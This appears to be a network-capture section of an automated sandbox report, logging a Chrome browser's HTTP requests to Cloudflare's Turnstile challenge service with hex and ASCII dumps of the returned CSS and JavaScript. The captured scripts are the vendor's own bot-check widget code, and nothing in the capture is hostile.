                                                                                                                                                                                                                                                          Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                                                                                                                                                                                                          2024-12-20 23:35:53 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                                                                                                                                                                                                          Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                                                                                                                                                                                                          2024-12-20 23:35:53 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                                                                                                                                                                                                          Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                                                                                                                                                                                                          2024-12-20 23:35:53 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                                                                                                                                                                                          Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          8192.168.2.549726104.18.94.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:35:53 UTC383OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-20 23:35:53 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Fri, 20 Dec 2024 23:35:53 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                          Content-Length: 47692
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          accept-ranges: bytes
                                                                                                                                                                                                                                                          last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                                                                                                                                                                                                                                          cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f53738f5d26efa5-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          2024-12-20 23:35:53 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                                                                                                                                                          Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                                                                                                                                                                          2024-12-20 23:35:53 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                                                                                                                                                          Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                                                                                                                                                                          2024-12-20 23:35:53 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                                                                                                                                                                                          Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                                                                                                                                                                                          2024-12-20 23:35:53 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                                                                                                                                                                                          Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                                                                                                                                                                                                          2024-12-20 23:35:53 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                                                                                                                                                                                          Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                                                                                                                                                                                          2024-12-20 23:35:53 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                                                                                                                                                                                                                          Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                                                                                                                                                                                                                                          2024-12-20 23:35:53 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                                                                                                                                                                                                                                                          Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
                                                                                                                                                                                                                                                          2024-12-20 23:35:53 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                                                                                                                                                                                                                                          Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                                                                                                                                                                                                                                          2024-12-20 23:35:53 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                                                                                                                                                                                                                                          Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                                                                                                                                                                                                                                          2024-12-20 23:35:53 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                                                                                                                                                                                                                                          Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          9192.168.2.549730104.18.95.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:35:54 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f53738f5cfa15bb&lang=auto HTTP/1.1
                                                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1gq28/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-20 23:35:55 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Fri, 20 Dec 2024 23:35:55 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                          Content-Length: 118433
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f537399dd724265-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          2024-12-20 23:35:55 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65
                                                                                                                                                                                                                                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconce
                                                                                                                                                                                                                                                          2024-12-20 23:35:55 UTC1369INData Raw: 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 65 6e 64 25 32 30 46 65 65 64 62 61 63 6b 22 2c 22 63 68 65 63 6b 5f 64 65 6c 61 79 73 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32
                                                                                                                                                                                                                                                          Data Ascii: turnstile_feedback_description":"Send%20Feedback","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%2
                                                                                                                                                                                                                                                          2024-12-20 23:35:55 UTC1369INData Raw: 2c 66 55 2c 66 59 2c 66 5a 2c 67 35 2c 67 36 2c 67 77 2c 67 44 2c 67 48 2c 67 33 2c 67 34 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 31 34 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 37 35 37 29 29 2f 32 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 34 33 31 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 30 32 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 38 35 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 67 49 28 39 34 39 29 29 2f 36 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 36 39 29 29 2f 37 29 2b 2d 70 61 72 73 65 49 6e 74 28 67
                                                                                                                                                                                                                                                          Data Ascii: ,fU,fY,fZ,g5,g6,gw,gD,gH,g3,g4){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1314))/1+-parseInt(gI(1757))/2+-parseInt(gI(431))/3*(-parseInt(gI(902))/4)+parseInt(gI(1285))/5+parseInt(gI(949))/6*(parseInt(gI(1569))/7)+-parseInt(g
